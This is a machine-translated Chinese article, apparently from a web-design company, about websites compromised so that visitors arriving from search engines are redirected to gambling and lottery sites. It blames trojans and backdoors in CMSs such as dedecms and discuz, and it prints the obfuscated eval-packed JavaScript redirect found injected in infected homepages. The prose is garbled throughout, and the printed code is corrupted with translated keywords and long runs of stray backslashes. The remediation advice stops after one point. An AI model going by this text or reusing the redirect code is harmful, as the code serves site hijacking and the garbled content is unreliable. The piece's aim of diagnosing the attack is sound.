近日，该公司内部纪录片同事表示，当大量网站建设公司客户正在进行百度推广时，该网站的主页会在点击网站后自动跳转到彩票网站和投注网站，以便用户从百度搜索或广告空间的推广后跳转。转，直接输入网址是没有跳，所以用户流失导致流量急剧下降，浪费网络服务器资源，浪费促销费用等，甚至可以说百度推广，搜狗促销都给予彩票公司广告，在网站建设行业引起轩然大波。

许多客户发现广告商在回答此问题时要补偿甚至调查责任。因此，在网站恶意登陆的问题上，我们的运营商需要注意并知道如何快速解决。建网网站建设由网络审核，经过测试总结。有以下经验：


首先，分析网站被粉红到博彩网站的原因。


在正常情况下，网站被黑客入侵后，黑客就知道服务器信息（服务器IP远程端口管理员帐户密码，SSH端口，root帐户密码）和包含FTP帐户密码的网站信息，导致黑客入侵木头。马或后门。


在整体安全监控中，asp网站和php网站上都有木马，这意味着木马可以存在php脚本木马，asp脚本木马和jsp脚本木马。这些特洛伊木马后门可以恶意篡改和上传网站。为管理员重命名，下载和其他高权限操作。网站被跳的网站，使用的网站架构是php + mysql架构，以及jsp + mysql架构。他们中的大多数使用开源程序，如dedecms，编织梦系统，phpcms系统，discuz系统。


当我们了解一些代码时，我们会在网站的主页上看到一些恶意篡改代码。删除恶意代码后，它可能会在几天内完全停止跳转，但过了一段时间，它将被跳过。转，这是一个非常烦人的症状补救措施。在短时间内，网站将再次跳转，因此很难甚至不可能完全消除网站漏洞的问题。


通过观察一些客户网站的主页，主页代码中将存在加密代码。这段代码是根。根据搜索引擎跳转的特点，如通过百度搜索，360搜索，搜狗搜索将直接跳转到彩票，赌博网站。 以下代码：


类型= \\\“文本/ JAVA\\\”> EVAL（功能（P，A，C，K，E，d）{E =函数（C）{回报（C35？使用String.fromCharCode（C+29）：c.toString（36））};如果（！\\\ '\\\'取代（/ ^/，字符串））{而（C - ）d[E（C）]= K[C] || e（c）; k = [function（e）{retun d [e]}]; e = function（）{return \\\'\\\\\\\\ w + \\\'}; c = 1;};而（c - ）if（k [c]）p = p.replace（new RegExp（\\\'\\\\\\\\ b \\\'+ e（c）+\\\'\\\\\\\\ b\\\'，\\\'g \\\'），k [c]）;返回p;}（\\\'l [\\\“\\\\\\\\\\\\\\\\\\\\ C\\\\\\\\1\\\\\\\\米\\\\\\\\我\\\\\\\\8\\\\\\\\?\\\\\\\\0\\\“] [\\\”\\\\\\\\7\\\\\\\\\\\\\\\\\\\\\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \1\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\\ 0 \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\ 1 \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\\\\ b \\\\\\\\ 1 \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\ '）; \\\'，29,29，\\\'X74 | X63 | X73 | X70 | X72 | X2F | X22 | X77 | X65 | X69 | X61 | X2E | x6f | X3D | 64 | X6A | x3e | X3C | X6D | X79 | X78 |窗口| X75 | x6e | X6C | X38 | X3A | X76 | X68 \\\”（| \\\ '分裂\\\）。'，0，{}） ）


一旦受到攻击，百度搜索引擎将确定该网站是否遭到攻击，以便百度风险评估中心将记录和识别该网站。百度URL安全中心提醒您，该网站可能被黑客入侵，有些网页被非法篡改！红色提示百度风险。领先客户打开网站直接被百度拦截。
针对上述跳跃攻击的特点，创客网站建设同意审核应从手动代码方面进行，检测网站漏洞，网站后门木马清理，漏洞修复，xss获取管理员帐户cookie。 Discuz具有漏洞，注入漏洞。获取管理员漏洞，discuz上传绕过漏洞等。


其次，修复和防止网站被恶意重定向


1.安全部署服务器目录，加密管理员帐户密码，并对所有密码执行数字+大写和小写字母+特殊符号要求。